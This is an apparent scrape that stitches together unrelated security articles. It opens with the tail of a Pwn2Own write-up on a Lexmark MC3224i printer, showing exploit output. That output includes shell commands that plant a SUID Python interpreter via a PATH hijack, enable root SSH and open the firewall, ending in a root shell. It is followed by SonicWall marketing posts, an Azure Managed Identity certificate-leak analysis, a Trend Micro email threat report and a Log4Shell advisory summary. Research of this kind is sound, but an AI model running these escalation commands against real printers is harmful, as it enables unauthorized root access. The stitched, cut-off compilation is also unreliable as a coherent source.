xxxxxxxxxxxxxxxxxxxxxxx!
[+] Reboot finished
[*] Probing device...
[+] Firmware: CXLBL.075.281
[+] Acceptable login methods: ['LDAP_DEVICE_REALM']
[*] Device IS NOT password protected
[+] Authentication bypass done
[*] Attempting to escalate privileges...
[*] Executing command (root? False):
    echo -e '#!/bin/sh\\n
    mount -o remount,suid /dev/shm\\n
    cp /usr/bin/python3 /dev/shm\\nchmod +s /dev/shm/python3' >
    /dev/shm/systemd-cat; chmod +x /dev/shm/systemd-cat
[+] HTTP status: 200
[*] Executing command (root? False): PATH=/dev/shm:$PATH /usr/bin/collect-selogs-wrapper
[+] request timed out, that’s what we expect
[+] SUID Python interpreter should be created
[*] Attempting to enable SSH daemon...
[*] Executing command (root? True):
sed -Ee 's/(RSAAuthentication|UsePrivilegeSeparation|UseLogin)/#\\1/g'
    -e 's/AllowUsers guest/AllowUsers root guest/'
    /etc/ssh/sshd_config_perf > /tmp/sshconf;
    mkdir /var/run/sshd;
    iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT;
    nohup /usr/sbin/sshd -f /tmp/sshconf &
[+] HTTP status: 200
[+] SSH daemon should be running
[*] Trying to call ssh... ('ssh', '-i', '/tmp/tmpd2vc5a2u', 'root@10.64.23.20')
root@ET788C773C9E20:~# id
uid=0(root) gid=0(root) groups=0(root)

Summary

In this blog, we described a number of vulnerabilities that can be exploited from the local network to bypass authentication, execute arbitrary shell commands, and elevate privileges on a Lexmark MC3224i printer. The research started as an experiment after the announcement of the Pwn2Own Austin 2021. The team enjoyed the challenge, as well as participating in Pwn2Own for the first time, and we welcome your feedback. We’d also like to invite you to read about the other device we successfully targeted during Pwn2Own Austin 2021, the Cisco RV340 router.

Additional Resources

Three Keys to Modern Cyberdefense: Affordability, Availability, Efficacy

Choosing a cybersecurity vendor can feel like a never-ending series of compromises. But with SonicWall’s portfolio of high-quality solutions — available at industry-leading TCOs and in stock — it doesn’t have to.

(Our previous supply-chain updates can be found here and here.)

If you’ve ever been to a small-town mechanic, chances are you’ve seen the sign: “We offer three types of service here — Good, Fast and Cheap. Pick any two!”

In cybersecurity, this can be framed as “Affordability, Availability and Efficacy,” but the idea is the same — when making your choice, something’s got to give.

The effects of this mentality are sending ripples across the cybersecurity industry. At the recent 2022 RSA Conference, Joe Hubback of cyber risk management firm ISTARI explained that based on his survey, a full 90% of CISOs, CIOs, government organizations and more reported they aren’t getting the efficacy promised by vendors.

Several reasons for this were discussed, but most came back to this idea of compromise —buyers want products now, and they’re facing budget constraints. So, they often believe the vendors’ claims (which tend to be exaggerated). With little actual evidence or confirmation for these claims available, and little time to evaluate these solutions for themselves, customers are left disappointed.

To make the buying process more transparent and objective, Hubback says, vendor solutions should be evaluated in terms of CapabilityPracticalityQuality and Provenance. While his presentation didn’t reference the Affordability-Availability-Efficacy trifecta directly, these ideas are interconnected — and regardless of whether you use either metric or both, SonicWall comes out ahead.

Availability: Supply-Chain Constraints and Lack of Inventory

Order and install times have always been a consideration. But the current climate has led to a paradox in modern cybersecurity: With cyberattack surfaces widening and cybercrime rising, you really ought to have upgraded yesterday. But in many cases, the components you need won’t be in stock for several months.

While many customers are being locked into high-dollar contracts and then being forced to wait for inventory, this isn’t true for SonicWall customers: Our supply chain is fully operational and ready to safeguard your organization.

SonicWall is currently fulfilling 95% of orders within three days.

Procurement Planning & Forecasting

“We’re hearing more often than not that our competitors don’t have the product on the shelf, but we’ve been managing this for nearly two years,” SonicWall Executive Vice President of Operations Yew-Joo Hoe said.

In autumn of 2020, as lead times began to creep up, SonicWall’s operations department immediately began altering internal processes, changing the way it works with suppliers and ships goods, and even re-engineering some products to deliver the same performance with more readily available components.

So now, even amid remarkable growth — 2021 saw a 33% increase in new customer growth, along with a 45% rise in new customer sales — SonicWall is currently fulfilling 95% of orders within three days.

But even as we’ve zeroed in on supply-chain continuity, our dedication to the Provenance of our supply chain has been unwavering. We aim to secure, connect and mobilize organizations operating within approved or authorized regions, territories and countries by ensuring the integrity of our supply chain from start to finish.

SonicWall products are also compliant with the Trade Agreements Act in the U.S., and our practices help ensure SonicWall products aren’t compromised by third parties during the manufacturing process.

Affordability: The Two Facets of TCO

SonicWall’s goal is to deliver industry-leading TCO. But this is more than a marketing message for us — we put it to the test.

SonicWall recently commissioned the Tolly Group to evaluate the SonicWall NSsp 13700, the NSsp 15700, the NSa 2700 and more against equivalent competitor products. Each time, the SonicWall product was named the better value, saving customers thousands, tens of thousands and even hundreds of thousands while delivering superior threat protection.

But we also recognize that the measure of a product’s affordability extends beyond the number on an order sheet, to how much labor that solution requires. Hubback summarized the idea of Practicality as “Is this actually something I can use in my company without needing some kind of Top Gun pilot to fly it and make it work?” With cybersecurity professionals getting harder to find, and their experience becoming more expensive every day, the ideas of Practicality and Affordability have never been so intertwined.

Fortunately, SonicWall has long recognized this association, and we’ve built our products to reduce both the amount of human intervention and the required skill level needed to run our solutions.

Innovations such as Zero-Touch Deployment, cloud-based management, single-pane-of-glass interfaces, simplified policy creation and management, and one-click rollback in the event of a breach have brought increased simplicity to our portfolio without sacrificing performance or flexibility.

Efficacy: How It’s Built and How It Performs

Hubback’s final two criteria, Quality and Capability, describe how well a solution is built, and how well it can do what it promises. Taken together, these form the core of what we think of as Efficacy.

While Quality is the most enigmatic of Hubback’s criteria, it can be reasonably ascertained based on a handful of factors, such as longevity, customer satisfaction and growth.

With over 30 years of experience, SonicWall is a veteran cybersecurity leader trusted by SMBs, enterprises and government agencies around the globe. In the crowded cybersecurity market, this sort of longevity isn’t possible without quality offerings — and our quantity of repeat purchasers and scores of customer case studies attest to the high standards we maintain for every solution we build.

In contrast, Capability can be very easy to judge — if a vendor chooses to put its products to the test. Independent, third-party evaluation is the gold standard for determining whether products live up to their promises. And based on this metric, SonicWall comes out on top.

To provide customers objective information about its performance, SonicWall Capture ATP with RTDMI has been evaluated by third-party testing firm ICSA Labs, an independent division of Verizon. For the past five consecutive quarters, the solution has found 100% of the threats without issuing a single false positive. SonicWall has now earned more perfect scores — and more back-to-back perfect scores — than any other active vendor.

Today, thousands of organizations will shop for new or upgraded cybersecurity solutions. While they may differ in size, industry, use case and more, at the end of the day, they’re all looking for basically the same thing: A reliable solution that performs as advertised, at a price that fits within their budget, that can be up and running as soon as possible.

There will always be those who tell you that you can’t have everything; that the center of this Venn diagram will always be empty. But at SonicWall, we refuse to compromise — and we think you should, too.

Source :
https://blog.sonicwall.com/en-us/2022/06/three-keys-to-modern-cyberdefense-affordability-availability-efficacy/

BEC Attacks: Can You Stop the Imposters in Your Inbox?

BEC attacks are a $1.8 billion dollar racket — and statistically, your business will be targeted sooner rather than later. Watch this webinar to learn how to stop them.

If asked which of the threat types tracked by the FBI causes the most financial damage, most people would say ransomware.

They’d be wrong.

In 2021, the FBI’s Internet Crime Complaint Center (IC3) received 19,954 Business Email Compromise (BEC) reports, with adjusted losses totaling almost $2.4 billion. That’s an average of more than $120,270 per incident, compared with just under $13,200 per incident for ransomware attacks.

Since the FBI began tracking these threats in 2013, tens of billions in financial losses have been recorded, resulting from nearly 170,000 incidents in 178 countries.

So why hasn’t this threat risen to the notoriety of ransomware?

During many ransomware attacks, business operations grind to a halt. When a company loses access to customer information, payment systems and mission-critical applications, it often becomes clear in short order that something is wrong.

But BEC attacks are comparatively silent. Even when these attacks have a huge impact on an organization’s bottom line, operations can generally continue as usual. As a result, businesses frequently opt to keep these attacks out of the public eye to avoid risking reputation damage and loss of trust.

But although ransomware still dominates security news, the growing frequency, volume and cost of BEC attacks have begun attracting more attention.

As a result, BEC attacks have become a top threat concern for many organizations today, according to a recent SonicWall-sponsored white paper by Osterman Research. “How to Deal with Business Email Compromise” reports primary research data from an in-depth customer survey of 119 respondents, each of which has direct knowledge of how their organization is addressing or planning to address the risk of BEC.

The results from this study offer a look at how security influencers and decision-makers are taking BEC into account when formulating their spending plans for the next 12 months. For example, while just 46% of organizations said they considered protecting against BEC attacks “important” or “extremely important” 12 months ago, 76% said they considered it important or extremely important today.

Image describing BEC Importance

80%

Organizations indicating that protecting against BEC attacks in 2023 is of high importance

The data also shows that three-fifths of organizations in the study view protecting against BEC attacks as one of their top five security priorities.

62%

Organizations ranking protecting against BEC attacks as one of their top five priorities.

How BEC Attacks Fly Under the Radar

But what makes BEC attacks so dangerous when compared with other forms of cyberattacks? And why are they harder to stop?

BEC is a specialized type of phishing attack that relies on social engineering. They often use a proven pretexting technique to engineer a quick introduction and establish a believable scenario in order to manipulate the victim to take a specific action.

While these attacks can target employees at any level of an organization, they generally start with an attacker impersonating a person with authority, such as a CEO or CFO, a manager, or a supplier. The attacker uses the authority figure’s identity to start a chain of plausible (but fake) requests to gain monetary payment. This typically involves instructing someone in accounts payable, someone in HR or even someone with a company credit card to pay a fake invoice, transfer funds, send gift cards or make payroll payouts. The urgent tone of these messages encourages the victim to respond or act quickly, bypassing any checks and balances that may be in place.

Compared with other forms of cyberattacks, BEC attacks are among the hardest to detect because the threat signals are far less obvious. Relying on trickery and impersonation, the approach is very subtle, and the actual delivery generally doesn’t use weaponized URLs or malicious attachments, which are easily detected.

In addition, the email content and the delivery mechanism are usually of higher quality and often tailored to target a specific person or persons. With little to no apparent sign of a threat, these messages can bypass most email security filters to reach the inbox — and the absence of any sort of alert, such as a contextual warning advising them to exercise caution, leaves the victim more vulnerable to falling for the scam.

Because so many of these scams are successful, their use has grown dramatically — today, roughly 80% of companies targeted by BEC attacks each year. While there isn’t much you can do to avoid being targeted, there’s plenty you can do to safeguard your organization’s finances. To learn more about BEC attacks and how to stop them, check out our webinar, “Can You Stop the Imposters in Your Inbox?

Source :
https://blog.sonicwall.com/en-us/2022/06/bec-attacks-can-you-stop-the-imposters-in-your-inbox/

An Analysis of Azure Managed Identities Within Serverless Environments

We examine Azure’s Managed Identities service and its security capability in a threat model as developers’ go-to feature for managing secrets and credentials.

Authentication and authorization play crucial parts when securing resources. Authentication verifies that the service or user accessing the secured resources has provided valid credentials, while authorization makes sure that they have sufficient permissions for the request itself.

Broken Access Control is listed among the top 10 OWASP prevalent web application issues from 2017 to 2021, and we have previously written about the importance of secrets management used for authentication. This occurs when an unauthorized user can access, modify, delete, or perform actions within an application or system that is outside the set permissions or policies, malicious or unintended. Broken access control has become the number one concern in the organization’s list, and in this article, we discuss Azure’s Managed Identities service inside the cloud service provider (CSP) to tackle the said web application issue.

Managing system and user identities

Managed Identities for Azure allows users to authenticate certain services available within the CSP. This is done by providing the cloud application a token used for service authentication. We distinguish between two types of managed identities: system-assigned identities and user-assigned identities. To differentiate, system-assigned identities are restricted from one to the resource, which means that different user roles can’t be applied to the same resource. On the other hand, user-managed identities solve this problem and we can imagine them as user roles.

Figure 1. Usage of Managed Identities


For instance, we want to use an Azure storage account within a serverless application for saving our application records. For this purpose, we decided to use a system-managed identity.

This practically means:

  • Enable managed identities inside a serverless function
  • Grant serverless functions the necessary permissions for storage account access

Figure 2. Enabling managed identities in a serverless function


After that, we can start using the managed identity for authentication to the storage account. In the following sections, we will look at how the managed identities interface is technically implemented within the serverless environment and the corresponding security implications based on our recent research.

Managing identities in the serverless environment

To make it work, the serverless environment runs a special .NET application process named “dotnet TokenServiceContainer.dll.” This process listens on a localhost and port 8081 to accept HTTP requests. The endpoint for requesting a token is http://localhost:8081/msi/token, and the required parameters specifies that the API version used and resource identifier for which the service requests the token. Optionally, it uses “client_id,” which is a parameter used when a managed user identity token is requested. The request also needs a specific X-IDENTITY-HEADER, and the needed value is present inside IDENTITY_HEADER or an MSI_SECRET environmental variable.

After receiving this token request, the request is delegated to the endpoint within the CSP (another service) and provides the requested token. The endpoint is publicly available and is a part of the *.identity.azure.net subdomain based on the region of the serverless application. By design and public access to the endpoint the service requires authentication, and this is done using a X509 client certificate. This certificate is unique to the specific application ID (meaning the serverless function has a one-to-one pairing of certificate and app ID) and valid for 180 days. If the request is successful, it returns a JSON response with a bearer token valid for one day.

Figure 3. Managed identities inside serverless environments


From that perspective, the security standard is high, which is expected from a CSP service. However, there is one hidden danger and that is the certificate itself. The certificate can be leaked by leaking environmental variables.

The Managed Service Identity (MSI) certificate is part of the encrypted container context, which can be accessed inside using a URL-specified CONTAINER_START_CONTEXT_SAS_URI and decrypted using the CONTAINER_ENCRYPTION_KEY variable. Once the certificate is leaked, it can be used to obtain the token outside the scope of CSP services and successfully used for publicly available service endpoints as it would be called from the CSP service.

Threat model and scenario

Figure 4. PoC of getting token using leaked environmental variables from Managed Identity service


At this point, we should emphasize that to be able to abuse the retained token, a certain factor (or malicious actor) must first leak these environmental variables and there must be an assigned role within the requested resource, the pre-requisites being the identities enabled and the role set for the application. This means there are no default roles unless explicitly specified within the CSP settings.

However, as this example of potential compromise shows from a gap leaking environmental variables of a Linux endpoint, using environmental variables for storing sensitive information is not a valid secure approach as they are by default inherited into the child process. Considering that the information is available inside the environment itself and that the certificate contains all the information provided, the endpoint for getting the token now becomes publicly available. A threat actor can get the authentication token outside of the CSP’s service and get all the permissions as the original user.

In this example, the token provider service within the serverless environment is running under a different user. Why is the client certificate available not only for this user in the form of a file with permissions only for that user? This allows a compromised serverless function to leak it and obtain the access token from the external service. But while the unauthorized user can’t get additional privileges other than what the function has, this is enough to conduct activities inside the environment that can have a range of damaging effects. By moving a client certificate into the security boundary of token service user and setting access permissions for the token service user as read-only, we guarantee that even in case of a compromise, the client certificate could not be leaked and used outside the CSP service without additional lateral movement.

The security chain is only as strong as its weakest parts. And while CSP services are not inherently insecure, small design weaknesses put together with improper user configurations could lead to bigger, more damaging consequences. Design applications, environments, and all their related variables with security in mind. If possible, avoid using environmental variables. Following best security practices such as applying the principle of least privilege helps to mitigate the consequences of a breach.

Source :
https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/an-analysis-of-azure-managed-identities-within-serverless-environments

Trend Micro Cloud App Security Threat Report 2021

In this report, we highlight the notable email threats of 2021, including over 33.6 million high-risk email threats (representing a 101% increase from 2020’s numbers) that we’ve detected using the Trend Micro Cloud App Security platform.

Email is an integral cog in the digital transformation machine. This was especially true in 2021, when organizations found themselves trying to keep business operations afloat in the middle of a pandemic that has forever changed how people work. At a time when the workplace had already largely shifted from offices to homes, malicious actors continued to favor email as a low-effort yet high-impact attack vector to disseminate malware.

Email is not only popular among cybercriminals for its simplicity but also for its efficacy. In fact, 74.1% of the total threats blocked by Trend Micro in 2021 are email threats. Meanwhile, the 2021 Internet Crime Report by the FBI’s Internet Crime Complaint Center (IC3) states that there was “an unprecedented increase in cyberattacks and malicious cyber activity” last year, with business email compromise (BEC) being among the top incidents.

In this report, we discuss the notable email threats of 2021 based on the data that we’ve gathered using the Trend Micro™ Cloud App Security™, a security solution that supplements the preexisting security features in email and collaboration platforms.

Download our infographic

Malware detections surge as attacks become more elaborate, targeted

The Trend Micro Cloud App Security solution detected and thwarted a total of 3,315,539 total malware files in 2021. More urgently, this number represents an increase of a whopping 196% from 2020’s numbers. There were also huge spikes in both known and unknown malware detections in 2021 at 133.8% and 221%, respectively.

Cybercriminals worked overtime to attach malware in malicious emails in 2021 using advanced tactics and social engineering lures. In January, we saw how Emotet sent spam emails that used hexadecimal and octal representations of IP addresses for detection evasion in its delivery of malware such as TrickBot and Cobalt Strike.

In May last year, we reported on Panda Stealer, an information stealer that targets cryptocurrency wallets and credentials via spam emails. We also shared an update on APT-C-36 (aka Blind Eagle), an advanced persistent threat (APT) group targeting South American entities using a spam campaign that used fraudulent emails impersonating Colombia’s national directorate of taxes and customs and even fake infidelity email lures.

QAKBOT operators also resumed their spam campaign in late 2021 after an almost three-month hiatus and abused hijacked email threads to lead victims to both QAKBOT and the SquirrelWaffle malware loader.

Meanwhile, ransomware detections continued to decline in 2021, a consistent trend that we have been seeing in previous years. Last year, the Trend Micro Cloud App Security solution detected and blocked 101,215 ransomware files — a 43.4% decrease compared to 2020’s detections.

The reason behind this continuing decline is possibly two-fold: One, unlike legacy ransomware that focuses on the quantity of victims, modern ransomware focuses on waging highly targeted and planned attacks to yield bigger profits. Since today’s ransomware actors no longer abide by the spray-and-pray ransomware model, the number of attacks are no longer as massive as the number that we witnessed in ransomware’s early days. We identified the other reason in our year-end roundup report: That is, it’s possible that ransomware detections are down because our cybersecurity solutions continue to block an increasing number of ransomware affiliate tools each year, including TrickBot and BazarLoader. This could have prevented ransomware attacks from being successfully executed on victim environments.

Known, unknown, and overall credential phishing attacks rose in 2021

Based on Trend Micro Cloud App Security data, 6,299,883 credential phishing attacks were detected and blocked in 2021, which accounts for a 15.2% overall increase. Similar to last year, the number of known credential phishing attacks is greater than the unknown ones. However, this year, the percentage of increase is at a staggering 72.8%.

When comparing 2020 and 2021’s numbers, we saw an 8.4% increase in the number of detections for known credential phishing links, while a 30% growth is observed in the number of detections for unknown credential phishing links.

Abnormal Security noted the increase in overall credential phishing attacks in one 2021 report and stated that credential phishing is attributed to 73% of all advanced threats that they’ve analyzed.

We have also documented the rise in credential phishing attacks from previous years. In fact, in the first half of 2019, the Trend Micro Cloud App Security solution detected and blocked 2.4 million credential phishing attacks alone.

BEC’s small numbers bring big business losses

The Trend Micro Cloud App Security solution intercepted a total of 283,859 BEC attacks in 2021. Compared with 2020’s BEC detections, this number represents a 10.61% decrease. Interestingly, there is an 82.7% increase in this year’s BEC attacks that were detected using Writing Style DNA, while there is a 38.59% decrease in attacks that have been blocked using the antispam engine.

Overall, BEC numbers have consistently been on a downward trend since 2020. But the reduction in BEC victims doesn’t equate to a dip in cybercriminal profits. According to the FBI’s IC3, BEC accounted for US$2.4 billion in adjusted losses for both businesses and consumers in 2021. According to the same organization, BEC losses have reached over US$43 billion between June 2016 and December 2021 for both domestic and international incidents.

We have also observed how BEC actors continuously tweak their tactics for ill gain. In August last year, our telemetry showed a gradual increase in BEC detections. Upon investigation, we discovered that instead of impersonating company executives and upper management personnel, this BEC-related email campaign impersonated and targeted ordinary employees for money transfers and bank payroll account changes.

Covid-19 lures, cybercriminal campaigns behind massive jump in phishing numbers

The Trend Micro Cloud App Security solution data shows that a total of 16,451,166 phishing attacks were detected and blocked in 2021. This is a 137.6% growth from 2020’s phishing numbers.

In contrast to last year’s numbers, we saw a significant jump in phishing attacks detected via spam count this year — a whopping 596% increase, to be specific. Meanwhile, we observed a notable 15.26% increase in credential phishing count compared to last year.

These high numbers reflect organizations’ sentiments about phishing attacks. According to a survey in an Osterman Research report titled “How to Reduce the Risk of Phishing and Ransomware,” organizations were “concerned” or “extremely concerned” about phishing attempts making their way to end users and employees failing to spot phishing and social engineering attacks before accessing a link or attachment.

While they kicked off majority of Covid-19-related phishing emails and sites in 2020, cybercriminals still exploited the global pandemic for financial gain. Last year, Mexico-based medical laboratory El Chopo shared that a fraudulent website that looked identical to the company’s had been launched. On that website, users could schedule a vaccination appointment after paying MXN2,700 (approximately US$130). To make the fake website appear credible, the malicious actors behind it added fake contact information such as email addresses and social media pages that victims can use for inquiries.

Early last year, we reported on a wave of phishing emails that pretended to be coming from national postal systems. This campaign attempted to steal credit card numbers from 26 countries. We also investigated a spear-phishing campaign that used Pegasus spyware-related emails to lead victims into downloading a file stealer. This campaign targeted high-ranking political leaders, activists, and journalists in 11 countries.

Protect emails, endpoints, and cloud-based services and apps from attacks with Trend Micro Cloud App Security

Organizations should consider a comprehensive multilayered security solution such as Trend Micro Cloud App Security. It supplements the preexisting security features in email and collaboration platforms like Microsoft 365 and Google Workspace (formerly known as G Suite) by using machine learning (ML) to analyze and detect any suspicious content in the message body and attachments of an email. It also acts as a second layer of protection after emails and files have passed through Microsoft 365 or Gmail’s built-in security.

Trend Micro Cloud App Security uses technologies such as sandbox malware analysis, document exploit detection, and file, email, and web reputation technologies to detect malware hidden in Microsoft 365 or PDF documents. It provides data loss prevention (DLP) and advanced malware protection for Box, Dropbox, Google Drive, SharePoint Online, OneDrive for Business, and Salesforce while also enabling consistent DLP policies across multiple cloud-based applications. It also offers seamless integration with an organization’s existing cloud setup, preserving full user and administrator functionality, providing direct cloud-to-cloud integration through vendor APIs, and minimizing the need for additional resources by assessing threat risks before sandbox malware analysis.

Trend Micro Cloud App Security stands on the cutting edge of email and software-as-a-service (SaaS) security, offering ML-powered features that combat two of the primary email-based threats: BEC and credential phishing. Writing Style DNA can help determine if an email is legitimate by using ML to check a user’s writing style based on past emails and then comparing suspicious emails against it. Computer vision, on the other hand, combines image analysis and ML to check branded elements, login forms, and other site content. It then pools this information with site reputation elements and optical character recognition (OCR) to check for fake and malicious sites — all while reducing instances of false positives to detect credential phishing email.

This security solution also comes with an option to rescan historical URLs in users’ email metadata and perform continued remediation (automatically taking configured actions or restoring quarantined messages) using newer patterns updated by Web Reputation Services.

This is a significant option since users’ email metadata might include undetected suspicious or dangerous URLs that have only recently been discovered. The examination of such metadata is thus an important part of forensic investigations that help determine if your email service has been affected by attacks. This solution also officially supports the Time-of-Click Protection feature to protect Exchange Online users against potential risks when they access URLs in incoming email messages.

Trend Micro Cloud App Security also comes with the advanced and extended security capabilities of Trend Micro XDR, providing investigation, detection, and response across your endpoints, email, and servers.

Source :
https://www.trendmicro.com/vinfo/us/security/research-and-analysis/threat-reports/roundup/trend-micro-cloud-app-security-threat-report-2021

Log4Shell Still Being Exploited to Hack VMWare Servers to Exfiltrate Sensitive Data

The U.S. Cybersecurity and Infrastructure Security Agency (CISA), along with the Coast Guard Cyber Command (CGCYBER), on Thursday released a joint advisory warning of continued attempts on the part of threat actors to exploit the Log4Shell flaw in VMware Horizon servers to breach target networks.

“Since December 2021, multiple threat actor groups have exploited Log4Shell on unpatched, public-facing VMware Horizon and [Unified Access Gateway] servers,” the agencies said. “As part of this exploitation, suspected APT actors implanted loader malware on compromised systems with embedded executables enabling remote command-and-control (C2).”

In one instance, the adversary is said to have been able to move laterally inside the victim network, obtain access to a disaster recovery network, and collect and exfiltrate sensitive law enforcement data.

Log4Shell, tracked as CVE-2021-44228 (CVSS score: 10.0), is a remote code execution vulnerability affecting the Apache Log4j logging library that’s used by a wide range of consumers and enterprise services, websites, applications, and other products.

Successful exploitation of the flaw could enable an attacker to send a specially-crafted command to an affected system, enabling the actors to execute malicious code and seize control of the target.

Based on information gathered as part of two incident response engagements, the agencies said that the attackers weaponized the exploit to drop rogue payloads, including PowerShell scripts and a remote access tool dubbed “hmsvc.exe” that’s equipped with capabilities to log keystrokes and deploy additional malware.

“The malware can function as a C2 tunneling proxy, allowing a remote operator to pivot to other systems and move further into a network,” the agencies noted, adding it also offers a “graphical user interface (GUI) access over a target Windows system’s desktop.”

The PowerShell scripts, observed in the production environment of a second organization, facilitated lateral movement, enabling the APT actors to implant loader malware containing executables that include the ability to remotely monitor a system’s desktop, gain reverse shell access, exfiltrate data, and upload and execute next-stage binaries.

Furthermore, the adversarial collective leveraged CVE-2022-22954, a remote code execution vulnerability in VMware Workspace ONE Access and Identity Manager that came to light in April 2022, to deliver the Dingo J-spy web shell.

Ongoing Log4Shell-related activity even after more than six months suggests that the flaw is of high interest to attackers, including state-sponsored advanced persistent threat (APT) actors, who have opportunistically targeted unpatched servers to gain an initial foothold for follow-on activity.

According to cybersecurity company ExtraHop, Log4j vulnerabilities have been subjected to relentless scanning attempts, with financial and healthcare sectors emerging as an outsized market for potential attacks.

“Log4j is here to stay, we will see attackers leveraging it again and again,” IBM-owned Randori said in an April 2022 report. “Log4j buried deep into layers and layers of shared third-party code, leading us to the conclusion that we’ll see instances of the Log4j vulnerability being exploited in services used by organizations that use a lot of open source.”

Source :
https://thehackernews.com/2022/06/log4shell-still-being-exploited-to-hack.html